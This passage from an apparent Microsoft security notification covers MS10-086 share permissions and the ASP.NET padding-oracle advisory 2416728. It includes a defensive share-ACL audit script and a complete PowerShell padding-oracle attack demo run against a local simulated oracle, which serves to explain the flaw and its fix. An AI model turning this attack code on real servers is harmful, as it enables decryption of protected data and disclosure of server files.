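        [string[]]$BroadSids = @('S-1-1-0', 'S-1-5-11')
    )

    # Win32 access-mask bits that let a caller change or remove data:
    # FILE_WRITE_DATA, FILE_APPEND_DATA, DELETE, GENERIC_WRITE, GENERIC_ALL.
    # For reference, the share templates are FULL = 0x1F01FF, CHANGE = 0x1301BF, READ = 0x1200A9 (no bit below set).
    $writeOrDelete = 0x2 -bor 0x4 -bor 0x10000 -bor 0x40000000 -bor 0x10000000

    $shares = Get-WmiObject -Class Win32_LogicalShareSecuritySetting -ComputerName $ComputerName
    foreach ($share in $shares) {
        $result = $share.GetSecurityDescriptor()
        if ($result.ReturnValue -ne 0) {
            Write-Warning ('Cannot read DACL of {0} (return code {1})' -f $share.Name, $result.ReturnValue)
            continue
        }
        foreach ($ace in $result.Descriptor.DACL) {
            if ($ace.AceType -ne 0) { continue }                       # 0 = ACCESS_ALLOWED; deny ACEs are not the problem here
            if ($BroadSids -notcontains $ace.Trustee.SIDString) { continue }
            if (($ace.AccessMask -band $writeOrDelete) -eq 0) { continue }
            New-Object PSObject -Property @{
                Share      = $share.Name
                Trustee    = '{0}\{1}' -f $ace.Trustee.Domain, $ace.Trustee.Name
                AccessMask = '0x{0:X}' -f $ace.AccessMask
            }
        }
    }
}

Get-OverPermissiveShareAces | Format-Table Share, Trustee, AccessMask -AutoSize
```

Anything the report lists on a cluster disk's administrative share should be re-permissioned by hand (or the share re-created after the update is installed); installing MS10-086 alone will not change it.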

Restart Requirement

This update requires a restart.

Bulletins Replaced by This Update

None

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-086.mspx

Microsoft has published Security Advisory 2416728

Microsoft is currently investigating a reported vulnerability in ASP.NET.

Further information follows below in English; see also the US TechNet page (http://www.microsoft.com/technet/security/advisory/2416728.mspx) or, shortly, the German TechNet page http://technet.microsoft.com/de-de/security/default.aspx.

What is the purpose of this alert?

This alert is to notify you that Microsoft released Security Advisory 2416728, Vulnerability in ASP.NET Could Allow Information Disclosure, on September 17, 2010.

Summary

Microsoft is investigating a new public report of a vulnerability in ASP.NET. An attacker who exploited this vulnerability could view data, such as the View State, that was encrypted by the target server, or read data from files on the target server, such as web.config. The attack works by tampering with the encrypted data: the attacker sends altered ciphertext back to an affected server and observes the error responses it returns, which differ depending on how decryption failed; repeated over many altered messages, those responses reveal the plaintext without the key. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time.

We are actively working with partners in our Microsoft Active Protections Program (MAPP) to provide information that they can use to provide broader protections to customers.

Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.
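The mechanism described in the summary, as an added example that is not part of the advisory or of ASP.NET: a padding oracle attack against .NET's own AES-CBC with PKCS#7 padding, the construction ASP.NET used for values such as the View State. The script plays both sides. Test-Padding stands in for the vulnerable server and answers only "padding valid or not", which is the distinguishable error the advisory describes; the attacker-side functions recover the plaintext from those answers alone, never touching the key. The key, IV and sample secret are generated locally, and every function name below is this example's own.

```powershell
# Added example, not from the advisory: CBC padding oracle against .NET's AES-CBC/PKCS#7
# (RijndaelManaged with a 16-byte block is AES-128; it lives in mscorlib, so no Add-Type is needed).

$key = New-Object byte[] 16
$iv  = New-Object byte[] 16
$rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
$rng.GetBytes($key)
$rng.GetBytes($iv)

function New-Cipher([byte[]]$Iv) {
    $c = New-Object System.Security.Cryptography.RijndaelManaged
    $c.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $c.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $c.Key = $key
    $c.IV  = $Iv
    return $c
}

function Protect-Data([byte[]]$Plain) {
    # Server side: what a legitimate page does before handing the value to the browser.
    $enc = (New-Cipher $iv).CreateEncryptor()
    return ,$enc.TransformFinalBlock($Plain, 0, $Plain.Length)
}

function Test-Padding([byte[]]$ForgedIv, [byte[]]$Block) {
    # The oracle. "Did decryption fail on the padding?" is all an attacker needs to observe;
    # ASP.NET leaked exactly this distinction through its error responses.
    $dec = (New-Cipher $ForgedIv).CreateDecryptor()
    try {
        [void]$dec.TransformFinalBlock($Block, 0, $Block.Length)
        return $true
    } catch [System.Security.Cryptography.CryptographicException] {
        return $false   # "Padding is invalid and cannot be removed."
    }
}

function Get-IntermediateBlock([byte[]]$Block) {
    # Recover I = AES-decrypt(Block) without the key: for pad value p = 1..16, make the already
    # known tail decrypt to p and brute-force one more byte until the oracle accepts the padding.
    $n = $Block.Length
    $inter = New-Object byte[] $n
    for ($pad = 1; $pad -le $n; $pad++) {
        $pos = $n - $pad
        $forged = New-Object byte[] $n
        for ($j = $pos + 1; $j -lt $n; $j++) { $forged[$j] = [byte]($inter[$j] -bxor $pad) }
        $found = $false
        for ($guess = 0; $guess -lt 256; $guess++) {
            $forged[$pos] = [byte]$guess
            if (-not (Test-Padding $forged $Block)) { continue }
            if ($pad -eq 1) {
                # A "valid" answer for the last byte could also mean 0x02 0x02 (or longer). A genuine
                # 0x01 padding does not depend on the byte before it, so flip that byte and ask again.
                $forged[$pos - 1] = [byte]($forged[$pos - 1] -bxor 0xFF)
                $stillValid = Test-Padding $forged $Block
                $forged[$pos - 1] = [byte]($forged[$pos - 1] -bxor 0xFF)
                if (-not $stillValid) { continue }
            }
            $inter[$pos] = [byte]($guess -bxor $pad)
            $found = $true
            break
        }
        if (-not $found) { throw "Oracle accepted nothing at byte $pos; it is not behaving like a padding oracle." }
    }
    return ,$inter
}

function Invoke-PaddingOracleAttack([byte[]]$FirstIv, [byte[]]$Cipher) {
    # Attacker side: per block, recover the intermediate value, then XOR it with the preceding
    # ciphertext block (the real IV for block 0) to get the plaintext. The key is never used.
    $bs = $FirstIv.Length
    $plain = New-Object byte[] $Cipher.Length
    $prev = $FirstIv
    for ($off = 0; $off -lt $Cipher.Length; $off += $bs) {
        $block = New-Object byte[] $bs
        [Array]::Copy($Cipher, $off, $block, 0, $bs)
        $inter = Get-IntermediateBlock $block
        for ($i = 0; $i -lt $bs; $i++) { $plain[$off + $i] = [byte]($inter[$i] -bxor $prev[$i]) }
        $prev = $block
    }
    # Strip the PKCS#7 padding, whose length the attack has now legitimately learned.
    $padLen = [int]$plain[$plain.Length - 1]
    $result = New-Object byte[] ($plain.Length - $padLen)
    [Array]::Copy($plain, 0, $result, 0, $result.Length)
    return ,$result
}

# Constructed demo: a secret only the server could encrypt, then recovered from oracle answers alone.
$secret    = [System.Text.Encoding]::UTF8.GetBytes('__VIEWSTATE demo: user=alice;role=admin')
$ct        = Protect-Data $secret
$recovered = Invoke-PaddingOracleAttack $iv $ct
'Recovered: ' + [System.Text.Encoding]::UTF8.GetString($recovered)
```

The point to take from the demo is that the attacker learns nothing from the ciphertext itself, only from the server's willingness to say why decryption failed; at most 256 questions per byte suffice. That is why the workaround in the advisory is to route every ASP.NET error to one identical custom error page, and why the eventual fix (MS10-070) additionally signs the data ASP.NET encrypts, so that any tampered value is rejected before the padding is ever examined.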

Mitigating Factors

· Microsoft has not identified any mitigations for this vulnerability.

Affected Software

The affected component in every case is the Microsoft .NET Framework; the table in the advisory lists, per operating system edition, the framework versions that are affected:

Windows XP

· Windows XP Media Center Edition 2005 and Windows XP Tablet PC Edition 2005: Microsoft .NET Framework 1.0 Service Pack 3

· Windows XP Service Pack 3: Microsoft .NET Framework 1.1 Service Pack 1, 2.0 Service Pack 2, 3.5, 3.5 Service Pack 1 and 4.0

· Windows XP Professional x64 Edition Service Pack 2: Microsoft .NET Framework 1.1 Service Pack 1, 2.0 Service Pack 2, 3.5, 3.5 Service Pack 1 and 4.0

Windows Server 2003

· Windows Server 2003 Service Pack 2: Microsoft .NET Framework 1.1 Service Pack 1, 2.0 Service Pack 2, 3.5, 3.5 Service Pack 1 and 4.0

· Windows Server 2003 x64 Edition Service Pack 2: Microsoft .NET Framework 1.1 Service Pack 1, 2.0 Service Pack 2, 3.5, 3.5 Service Pack 1 and 4.0

· Windows Server 2003 with SP2 for Itanium-based Systems: Microsoft .NET Framework 1.1 Service Pack 1, 2.0 Service Pack 2, 3.5, 3.5 Service Pack 1 and 4.0

Windows Vista

· Windows Vista Service Pack 1: Microsoft .NET Framework 1.1 Service Pack 1, 2.0 Service Pack 2, 3.5, 3.5 Service Pack 1 and 4.0

· Windows Vista Service Pack 2: Microsoft .NET Framework 1.1 Service Pack 1, 2.0 Service Pack 2, 3.5 Service Pack 1 and 4.0

· Windows Vista x64 Edition Service Pack 1: Microsoft .NET Framework 1.1 Service Pack 1, 2.0 Service Pack 2, 3.5, 3.5 Service Pack 1 and 4.0

· Windows Vista x64 Edition Service Pack 2: Microsoft .NET Framework 1.1 Service Pack 1, 2.0 Service Pack 2, 3.5 Service Pack 1 and 4.0

Windows Server 2008

· Windows Server 2008 for 32-bit Systems: Microsoft .NET Framework 1.1 Service Pack 1, 2.0 Service Pack 2, 3.5, 3.5 Service Pack 1 and 4.0

· Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2: Microsoft .NET Framework 1.1 Service Pack 1, 2.0 Service Pack 2, 3.5 Service Pack 1 and 4.0

· Windows Server 2008 for x64-based Systems: Microsoft .NET Framework 1.1 Service Pack 1, 2.0 Service Pack 2, 3.5, 3.5 Service Pack 1 and 4.0

· Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2: Microsoft .NET Framework 1.1 Service Pack 1, 2.0 Service Pack 2, 3.5 Service Pack 1 and 4.0

· Windows Server 2008 for Itanium-based Systems: Microsoft .NET Framework 1.1 Service Pack 1, 2.0 Service Pack 2, 3.5, 3.5 Service Pack 1 and 4.0

· Windows Server 2008 for Itanium-based Systems Service Pack 2: Microsoft .NET Framework 1.1 Service Pack 1, 2.0 Service Pack 2, 3.5 Service Pack 1 and 4.0

Windows 7

· Windows 7 for 32-bit Systems: Microsoft .NET Framework 3.5.1 and 4.0

· Windows 7 for x64-based Systems: Microsoft .NET Framework 3.5.1 and 4.0

Windows Server 2008 R2

· Windows Server 2008 R2 for x64-based Systems: Microsoft .NET Framework 3.5.1 and 4.0

· Windows Server 2008 R2 for Itanium-based Systems: Microsoft .NET Framework 3.5.1 and 4.0

Recommendations

Review Microsoft Security Advisory 2416728 for an overview of the issue, details on affected components, mitigating factors, workarounds, suggested actions, frequently asked questions (FAQs), and links to additional resources.

Customers who believe they are affected can contact Customer Service and Support (CSS) in North America for help with security update issues or viruses at no charge using the PC Safety line (866) PCSAFETY. International customers can contact Customer Service and Support by using any method found at http://www.microsoft.com/protect/worldwide/default.mspx.

Additional Resources

· Microsoft Security Advisory 2416728, Vulnerability in ASP.NET Could Allow Information Disclosure: http://www.microsoft.com/technet/security/advisory/2416728.mspx

· Microsoft Security Response Center (MSRC) Blog: http://blogs.technet.com/b/msrc/archive/2010/09/17/security-advisory-2416728-released.aspx

· Microsoft Security Research & Defense (SRD) Blog: http://blogs.technet.com/b/srd/archive/2010/09/17/understanding-the-asp-net-vulnerability.aspx

· Microsoft Malware Protection Center (MMPC) Blog: http://blogs.technet.com/mmpc/

Regarding Information Consistency

We strive to provide you with accurate information in static (this mail) and dynamic (web-based) content. Microsoft’s security content posted to the Web is occasionally updated to reflect late-breaking information. If this results in an inconsistency between the information here and the information in Microsoft’s web-based security content, the information in Microsoft’s web-based security content is authoritative.

Thank you,

Microsoft CSS Security Team